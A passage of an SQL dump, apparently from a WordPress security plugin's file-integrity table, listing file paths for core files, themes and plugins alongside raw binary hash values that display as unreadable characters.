�4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"w{|>^Dг�K�G\n�\'','ƏE}��t�n��	=�|8�/3�`�|�-s�jY�','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�?MƢ�C��\" =#��','wp-content/themes/clean-magazine/css/clean-magazine-metabox-tabs.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|\0�yfw��d~�','�ɨ9�3�\Z{�=���3�q�.�n����y?�','',0,'?'),('�D�08i��O?�[��','wp-content/themes/nirvana/images/columns/nirvana-column1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?0����fm&�x��Z','3�h�]��[�w�/���m\"��{�B�\0<=���','',0,'?'),('�Q���iW����\'�','wp-content/themes/verbosa/languages/verbosa.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�K$4m�@Y���','���VK$\\���u��VuF>��_]BΉ\r��','',0,'?'),('�[��4\r�\0\"�o�d','wp-content/themes/square/inc/css/chosen-sprite@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aO�amM�Sg�hP\\�5','���(\\��n��k:J�!X�����X�<RЈj4','',0,'?'),('�`��h5gfEE~w���','wp-content/plugins/unyson/framework/includes/option-types/addable-option/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�1�+n� RH�','Օ\\���v$>�#L����\r\Z�G>���e����&d','',0,'?'),('�eg��<�{I���_�','wp-content/themes/panoramic/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Lpg���;�f���','�5\'�y�H�mjtޭ̡��x��\'~/�s�N�?�','',0,'?'),('�i2O�׍��+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('�i��\'n�?�O)O��8','wp-content/themes/fabulous-fluid/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&.[8�oi5&�	�.�','��VgD�s�%��X���.Fǥ�<�\rGg�ö�','',0,'?'),('�l��j�&���`C%�','wp-content/themes/sg-window/img/icons/small/flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Z\\s}�h�Fr²ٻ1d','�X�`�ANB��S��K\"���0=���K�>��','',0,'?'),('��G���ќ��Jb3i','wp-content/themes/illdy/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��1s)Ac���/','	��Եа�&[(rM�UrP�\r?c��\0�9)�V��','',0,'?'),('���U�4牊3Q=�KL','wp-content/plugins/spam-captcha/core/debug.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\'E�O��[�ť�','\'~|��8����i�zp�a�����#�L�T3�','',0,'?'),('���tw�ES3��z1�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/view.php',0,'yB8h�v�j�QJ:��','yB8h�v�j�QJ:��','n�As\Z��!�\Z�4%���RG\r�V��\nN���V','',0,'?'),('���Z�>1ց�E�.','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4xM��R+G�/��Ob','�G0�)J\"���Y���d�<H�O�&O6��','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raX\'��z\05+�\"�7','v�$�r�_s�y�Y���U{ؘ?��C','',0,'?'),('���e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('���P*�&=a��94NA/','wp-content/plugins/spam-captcha/core/css/post_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�|;�t�%��2�.','&\\��F�R��Sʚ�t�}�|�_�\\�q�mLx`','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('�Ġk������r�','wp-content/themes/hueman/languages/fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ml�\"�ؓƅ�E���','o�	LF��e�>Nj�jr����\no�ƿS��T','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bvA�n�a��1 C��','�g�����z��߶u��p{��!v|�*^��3	�G','',0,'?'),('��(�ә%���n���,','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ca.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��<���[�.ܧ���','L��իo��8+���N�R��}XK=t]�%','',0,'?'),('���(��N�>��fN','wp-content/themes/fluida/admin/images/image-style-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[����v�,,i�ѽ','�JM	l���X\n\'D�Z$�\0�/?�����)���','',0,'?'),('����Q�9\'�@$�kP�','wp-content/themes/fluida/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��POf�%����?�׫','<� ��zT_���pq��iOj�6������','',0,'?'),('�� �%�S�nN�t�','wp-content/themes/illdy/inc/admin/welcome-screen/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',^(�W��2]	�G�*','\Zq)���kY��y�4Pj���BIb%l(���','',0,'?'),('�����1�[r�fy�V��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_modals.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z$���_�3��','i�Vu\'���jp�B���v��V����-\"���7','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�Oq�W����','a\"��μ�s�f��Ѳ>Zbk�xֲ|<�A','',0,'?'),('�	�6Q�R,��\r','wp-content/themes/hueman/assets/front/css/dev-font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��8��L��b�','],��C�-�i5�Z���J��(��ΈQ$�','',0,'?'),('�����P�W\r�j2;','wp-content/plugins/contact-form-7/languages/contact-form-7-eu.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\n@���K���','������x!�oE.��ꦐ�JΚW�t�OG�','',0,'?'),('�!\"ro�ɿ��M�8�','wp-content/themes/twentynineteen/inc/icon-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�:L���o#5]Z�',')��D��7��^�ޞ��>���?}���4u����','',0,'?'),('�#R�6�ި�Y�x�','wp-content/themes/wen-business/assets/js/goto-top.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���7oc����','���\\ڒ��ʏx���m�u�{�l�(\Z','',0,'?'),('�1�`��B���¡]�s','wp-includes/css/dist/editor/editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۑv2l����w�i�','ƺ\Z4�_�9lR��kU��k\rP\'7��/^�','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('�BK�@�~&�^��8','wp-content/themes/twentynineteen/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P\rP��f�Y�_','�ͮ����ˤ��g�Y�H�_�^F�1c�','',0,'?'),('�N����KapR(\\��','wp-content/themes/illdy/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�J�ۀ�r�eeNS�','X7ˏ63� �������$U����V���','',0,'?'),('�X֦�,�$j���','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryCenterImages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r8�|����~�}+��','\Z�u`fL�nc�7�RF�m���#���J~De��','',0,'?'),('�]�Y��zk��J�U�','wp-content/themes/precious-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&[Ȉy\"_(�g��','�I��i�B�3*u��G�-`v攉�+��_','',0,'?'),('�eCy��[�0ی�A���','wp-content/themes/fabulous-fluid/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�̨�!�[�ᅲ|[','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('�n��T��ϲ�<\"��','wp-content/themes/relia/layouts/sidebar-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{�˂���,�','FTsg�QV֠\"	��լ/�fK�nZ~7>�\\r','',0,'?'),('�r��|��/��4^y�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/unyson-font-icon/fonts/icomoon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ń���%�TH�U\Z\'�M�','_2���^��y��&m���D��m2�;�隆','',0,'?'),('�x�c����ױͼ��','wp-content/plugins/all-in-one-wp-migration/lib/view/import/oxygen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�읇�b�������','R����b�]�R��8�KX�t�H�@�jв�G','',0,'?'),('��3��4=�Ř����^','wp-content/themes/vega/assets/js/jquery.smartmenus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^0����>�Ό�','�%B�Mrt�]h�\'�S�]��hR$6%؂7c��','',0,'?'),('��Օ�2�\r�ZB��','wp-content/themes/nirvana/images/socials/Etsy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�\0\Z��_\'�D','{�*�I�f�o�y<�2���L�Ie֮��B�E��','',0,'?'),('���UT�_y��}K��','wp-content/themes/panoramic/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����&ORr����0b','Q�f�\"y��+�/(1,�o�V���Q�ا*�G�!�','',0,'?'),('��5GGM���ɕaSv�','wp-content/themes/nirvana/admin/images/2cSl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�	g�fY��g�\\jU&','1�x6H�]�r�����{aL���)�;�k��-��','',0,'?'),('��o���1?�p�ی��N','wp-content/plugins/unyson/framework/extensions/builder/class-fw-extension-builder.php',0,'�M��U�����$�@	�','�M��U�����$�@	�','��\0E�f�K��=W\"��FO��9�	����\Z�','',0,'?'),('���k��̪�J�\0�','wp-content/themes/fabulous-fluid/images/no-featured-image-840x565.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\\s�Rt��,�H�','\\�\\��z�H�ҳih�їU���WlH��','',0,'?'),('���\0��W�mG�=��','wp-content/themes/lightly/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|n���p��v&�','�1+<K�M��˷F@&R̲���t|a==m��R�','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>{�N�Hbp�?\'�','��+�>���=|����\\���a����&','',0,'?'),('��B\nMvH�1��/�@�','wp-content/themes/skt-construction-lite/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:����p�����','��ӴK�ŠR�^� �1>2�L�v��H��\'�&','',0,'?'),('��hM\nH���\r)iY�','wp-content/plugins/spam-captcha/lang/spam_captcha-no_NO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɢ��慺���|[���','<���ƛ���&G��k��x��}6��`�`�','',0,'?'),('�˽\0��.sw���[��','wp-content/themes/hueman/assets/front/js/lib/jquery.flexslider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,zn�1č/6�4�','S��:T�-�,�<�N{r�P*d0HY���\\X�','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3{��w�T���cJr�','�C�*f��c\\����5�����L�:P���О�','',0,'?'),('���6b(3���3�B','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_text-overflow.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��Umڹ�0L��','h���}��Ƌ%F��BW��\'�m��姥','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('��۲\\�5�F�s�','wp-content/themes/morfeu/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�%z�<j�U�V�','�jk\r���}�w��@�5���G:��%x����','',0,'?'),('��!�㷭�\\���l+','wp-content/themes/verbosa/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�4�����g��%�','���2������J\r��W�[�-ef�#,Ĥ`���|','',0,'?'),('�$D�X5�LR\\`��p�','wp-content/themes/alpha-store/lib/welcome/css/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RՀ�z�R�g�)','��dfl�/��w��Ngه�3�}��y��� >�','',0,'?'),('�%0J {��6i','wp-content/themes/hueman/option-tree/assets/css/ot-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѓw��[�	�W���$��','������?O���p�>�� �(�?�E��N)Ԥ','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�*��`(��e�5��\'�','wp-content/themes/square/inc/square-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�ă�v�GQO\'���','�`������j5�\\$;I�����\0�U\n��','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϧ�7h\'z�sLY��','\'��|��dRH�ʘ����&�1,U�\0s6','',0,'?'),('�A�%�����b8�<�y','wp-content/themes/alpha-store/template-parts/demo-layout-two.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';M�<>�O�K5��wW\n','ż�l�6���B=�I|�]���_q�Le���x��2','',0,'?'),('�B���U�uK��\'g�','wp-content/plugins/unyson/framework/static/img/no-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'K_��l\'n����Pd','�/g�n��\r�G�����l,*u?��e��D��:�3','',0,'?'),('�C������E7�`d�1','wp-content/themes/fabulous-fluid/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K?��E>\0X5�6�\n','\"g5�-v\']~A�΅�Ȟ:\r���GCcWh','',0,'?'),('�D�\rT����1','wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���ط�ԙ�U�','�l-�����]���DP_���r��kHr�\Z','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��|#n��\0Y���','\\,���5�^�[A��:p��	�F���R��','',0,'?'),('�Fo��M�oT-C�in0','wp-content/plugins/unyson/framework/static/js/option-types.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tZm�V.��9M\0��t','������Ow)��; �Q�U\'�\\8���	','',0,'?'),('�F�U���r���+�','wp-content/themes/lightly/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9OhMf��f�]>�','E�VS`$?�a�j`)��x�0��+X����K��','',0,'?'),('�P�4ՓQ�)zS���','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���G�ᆻ��$','*+���\0%G�;�_dE}u�-��4w�\"�','',0,'?'),('�U\'�I�\\�B—^��','wp-content/themes/mh-magazine-lite/includes/widgets/mh-custom-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t����v�T-:���','��.Om}�$�-���r+RL�g΋\\�z7|1=s','',0,'?'),('�u9�A�^Z^]�m0','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/config.php',0,'s�.�>��\Zc����','s�.�>��\Zc����','��x16ߟ�������)��ŗ�������wE�','',0,'?'),('�zL�w�1	/D��','wp-content/plugins/unyson/framework/includes/option-types/popup/class-fw-option-type-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⏀/z���ZPI�','E���k�y2*-���R��>�m�x� �3��x4�9','',0,'?'),('���\0�$���:ͨ]o32','wp-content/plugins/spam-captcha/core/lang/SL_framework-he_IL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5${��b��	צK�n',';�B���\"G�A����~��\ZY������3*','',0,'?'),('��F1}Et�jut����','wp-content/themes/twentyseventeen/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�g2�Dqq�Vr','���;b�������#���7]�X+�s�6���','',0,'?'),('���~��\'ԅ\ZH�0s��','wp-content/themes/fluida/resources/fonts/elusive.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�󉎪]C��9�','����4Jb�N��Fs�i�m���O��O���A�','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('��͝Ė\Z��~CZ�1','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/views/tabular.php',0,'�e�GF�\'�®P�5[','�e�GF�\'�®P�5[','y�-��K \\�	��K��|�����9놌>��ٝ�','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f���/�Pe��','�v��H1G�t�+�l�O\r�>��qc���m\\�iS','',0,'?'),('��f1D�I��M!��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.in.php',0,'ǫjN�t�6�G�C�o','ǫjN�t�6�G�C�o','HW]ύ�w{>`���\"�ކ���2}�(����','',0,'?'),('��{�I\".�xR�v\r�','wp-content/plugins/unyson/framework/includes/option-types/multi-select/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�z}UV��tK��sj','��+�\Z %i��3t��]�����:d�e1��A4','',0,'?'),('��Y_I��K�?d�f��','wp-content/themes/nirvana/languages/cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���(����R��','�-�x�j��f���;��+����#R�X`\"[','',0,'?'),('�\n]_\\����ξ�l&i','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-featured-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\n���h-����qT','�Ms�.Q�T���o#�����Uʎ�5�j��','',0,'?'),('�{joyȦʷV�zU','wp-content/themes/mh-magazine-lite/woocommerce/mh-custom-woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�]���V�,7Oz �','Vs��W-���:q���͹�U�cf���7�Gy','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('��7/B��?)+�O\'','wp-content/themes/square/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�IN^XؙT��{��','&)�X�\\LW4�8�����oO���4�','',0,'?'),('�0p!s&7�W�߻U','wp-content/plugins/all-in-one-wp-migration/lib/view/common/leave-feedback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vp\r��2�&���=YQ�','�_��B���}�x?�%ƃr����M�]','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#uy�d>�ٲ�(H�(','o\'U����~ߡ�e�g�|�(��ې�3,�$','',0,'?'),('�>SMp4|I�a�\05�	','wp-content/plugins/unyson/framework/static/libs/unycon/fonts/Unycon.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�d���J����l�','����!��@#��ac=�4#D]�����K(','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('�N�d�B�!�dg`�','wp-content/plugins/unyson/framework/extensions/backups/includes/module/schedule/settings-options.php',0,'.t��T%6�+�V','.t��T%6�+�V','�b�0�\n�9�J�r<R�$9���IMQ��7�	�h','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�W���ɘ���RA\Z','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iN���t�d��{�','�u��8���z��l��߄�8��wT����D)','',0,'?'),('�W�i�\0�k�in�WY','wp-content/plugins/contact-form-7/languages/contact-form-7-fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�2F�N��\n��^��','K�;��Y�k���x�EW\n�ڱ�AI�}�r&(Ш`7','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$,��:�U�P��','�%f\0|8;���L<,������ \\�\r�\Z� ','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�`kqৃ����耆','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/class-fw-option-type-table.php',0,']�$Wn�r2�X��r�',']�$Wn�r2�X��r�','8�)���T�najG�衳���	_@k�F�ß?�q','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y\0�$~��aa�','�՚=p�\Z�y*�\'e�� <kJ�(CJ\0�%\0��Fe','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�G::��z\r��','��:e��Y���Dt��4:�Ǫ�\0w�#���Ʋ>','',0,'?'),('�k(�,z2 ��\rf9�','wp-content/plugins/wordpress-seo/admin/class-plugin-compatibility.php',0,'�\0i1��F��:','�\0i1��F��:','���ۈ#T.��W������p6�Ǣ��~6Y','',0,'?'),('�m��KƭC�_�d','wp-content/themes/illdy/layout/scss/main.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���N>�\"4����','\0!��bj�$�K����\n޴�d�i�)MQ\Zee�','',0,'?'),('�wI����>�VD {��','wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-active-callbacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�>zbׄ!�TDi\rS','�(��ÚdD�n�S���\0��H�\0���$�','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('��ɌZ�(���a�q�','wp-content/themes/hueman/assets/admin/img/col-3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �eHo�=K�vX�F$','�{�4�N���é�뭅��M�מh�j�1\rqo','',0,'?'),('��!��9���a�̝�','wp-content/plugins/unyson/framework/includes/option-storage/class-fw-option-storage-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VU�A@ݾne�1�>','�B?�U��鮱дN��ٴ��Ş� �h','',0,'?'),('��\\�颜	`�=]�','wp-content/plugins/unyson/framework/includes/option-types/icon/class-fw-option-type-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���L����}��','�s��$-�&�l�`�\r��f~v��	����','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('��%k��k.��T\Z$','wp-content/themes/lightly/inc/customizer-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�eʇ�C�i�RC�S�',')G{n��e���T���Bku߯�RpI��8�','',0,'?'),('��e��-osŕ;�/�','wp-content/themes/twentynineteen/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z]/��\'\'~�z�].Z[','�/} ���	��ԾA9{�!���w���a��.','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��)�� ��U�o','�#��d��	ǂ�z�_��w��T,�K�ޒ�8�','',0,'?'),('���/i�V��e�0','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/views/view.php',0,'AFC�F���H�P3�\r�','AFC�F���H�P3�\r�',';k��Ʃ�F�Pn�礽˞6v:���AIG��7','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('��TU-c�z�g��#|','wp-content/themes/hueman/assets/front/img/demo/8-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� 4����_�T��','��	��R��m�o$ۍ��l�aX�8�J,�Po\"!','',0,'?'),('��i	\"[>�_g��4�','wp-content/themes/fabulous-fluid/images/featured-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ERV�}\r*ue�v%J','i��<��9�	�9��t����,��>���\Z�','',0,'?'),('�҉#=_t�[׫���_','wp-content/themes/fluida/resources/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('��N�����f','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ip.afrinic.php',0,'A:�G�����fC','A:�G�����fC','��81�����W\n�\"�\0}������Soj','',0,'?'),('��=G&S@�>m�\Z^�','wp-content/plugins/unyson/framework/extensions/social/extensions/social-facebook/class-fw-extension-social-facebook.php',0,'zp\ZM�43b�JƖ�\'��','zp\ZM�43b�JƖ�\'��','���un�먅v�d;�F;�R{j�T�9��.�X�','',0,'?'),('��{ˬ��1\ZzW=�;�','wp-content/themes/wen-business/inc/hook/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\0\ZyI_LPbi�\\��L\r','��ʊv��f��&�� �W׃UB��k*��0','',0,'?'),('��=T�	